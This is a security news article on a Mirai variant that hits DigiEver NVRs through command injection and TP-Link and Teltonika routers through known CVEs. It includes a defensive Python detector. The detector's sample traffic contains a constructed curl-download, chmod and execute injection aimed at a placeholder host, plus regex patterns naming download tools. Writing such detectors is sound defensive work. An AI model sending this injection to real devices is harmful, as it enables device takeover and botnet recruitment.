Thursday, December 26, 2024
A new Mirai-based botnet has been discovered exploiting vulnerabilities in network devices, primarily targeting DigiEver DS-2105 Pro Network Video Recorders (NVRs), outdated TP-Link routers, and Teltonika RUT9XX routers running old firmware.
The campaign began in September 2024. Its primary entry point is a remote code execution (RCE) flaw in the DigiEver NVRs: attackers send HTTP POST requests to the URI /cgi-bin/cgi_main.cgi carrying injected shell commands such as curl and chmod, the usual download-and-execute pattern. At the time of writing this vulnerability has neither a CVE identifier nor a vendor fix. The botnet also exploits known, patched vulnerabilities: CVE-2023-1389 in TP-Link devices and CVE-2018-17532 in Teltonika RUT9XX routers.
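The request pattern above is easy to turn into a detection: flag any POST to /cgi-bin/cgi_main.cgi whose form-encoded values contain shell metacharacters or download/execute tools. The following is an added example (not code from the article or from Akamai) that parses raw HTTP requests and scores each parameter value. The sample requests are constructed; the parameter names (`item`, `value`) and the payload host 198.51.100.7 are placeholders, since the report only gives the path, the method and the curl/chmod commands.

```python
import re
from urllib.parse import parse_qsl

TARGET_PATH = "/cgi-bin/cgi_main.cgi"

# Shell metacharacters that chain or terminate a command, plus the tools the
# report says the injected payloads call (curl, chmod) and common companions.
META_RE = re.compile(r"[;&|`]|\$\(")
TOOL_RE = re.compile(r"\b(?:curl|wget|chmod|tftp|busybox)\b")


def make_post(path: str, body: str, host: str = "nvr.example.internal") -> bytes:
    """Build a constructed form-encoded POST so the samples stay consistent."""
    return (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n\r\n{body}"
    ).encode()


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target.split("?", 1)[0], headers, body.decode("latin-1")


def inspect_request(raw: bytes):
    """Return per-parameter findings for a suspicious POST to the NVR CGI, else None.

    Each form value is decoded individually (parse_qsl handles %XX and '+'), so
    the literal '&' separating fields is never mistaken for a shell metacharacter.
    """
    method, path, _headers, body = parse_request(raw)
    if method != "POST" or path != TARGET_PATH:
        return None
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        tools = sorted(set(TOOL_RE.findall(value)))
        metas = sorted(set(META_RE.findall(value)))
        if tools or metas:
            findings.append({"param": name, "tools": tools, "metachars": metas, "value": value})
    return findings or None


def scan(requests):
    """Run inspect_request over a batch of raw requests and keep only the hits."""
    return [f for f in (inspect_request(r) for r in requests) if f]


# Constructed sample traffic. Parameter names are placeholders: the report does
# not name the injectable field, only the CGI path, the method and the commands.
SAMPLE_REQUESTS = [
    # benign configuration save
    make_post(TARGET_PATH, "action=set&item=hostname&value=nvr-lobby"),
    # injected download-and-execute chain, form-encoded as a bot would send it
    make_post(
        TARGET_PATH,
        "action=set&item=server&value=1%3Bcurl+http%3A%2F%2F198.51.100.7%2Fx.sh+-o+%2Ftmp%2Fx"
        "%3Bchmod+777+%2Ftmp%2Fx%3B%2Ftmp%2Fx",
    ),
    # same payload aimed at a different CGI: out of scope for this rule
    make_post("/cgi-bin/other.cgi", "value=1%3Bcurl+http%3A%2F%2F198.51.100.7%2Fx.sh"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        for f in hit:
            print(f"ALERT {TARGET_PATH} param={f['param']} tools={f['tools']} meta={f['metachars']}")
            print(f"  decoded: {f['value']}")
```

Decoding before matching matters: the `;` that chains the commands travels as `%3B`, so a rule applied to the raw body would miss it. On a real deployment the same logic runs over a reverse proxy's request log or a WAF rule in front of the NVR, and any hit on an unpatched DigiEver device should be treated as a likely compromise rather than a blocked attempt.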
Akamai's researchers report that this Mirai variant uses the command injection to download its malware binaries from external servers and enrol the compromised device in the botnet. Infected devices are then used for Distributed Denial of Service (DDoS) attacks or to scan for and infect further devices. Unlike the original Mirai, the variant uses XOR and ChaCha20 encryption to hide its contents from signature-based detection and analysis.
Akamai's researchers note that the move to more complex decryption routines reflects the evolving tradecraft of botnet developers. Although the variant adds these techniques on top of the original Mirai source code, it still uses some of Mirai's traditional obfuscation methods. Akamai's report includes indicators of compromise (IoCs) and YARA rules for detecting and blocking the botnet.
Users of DigiEver, TP-Link, and Teltonika RUT9XX devices are advised to update firmware promptly, replace devices that can no longer be patched, and review security settings to mitigate attacks by this Mirai-powered botnet. Because no fix exists yet for the DigiEver flaw, patching alone does not cover it: keep the NVR's web interface off the internet and monitor for POST requests to /cgi-bin/cgi_main.cgi containing shell commands.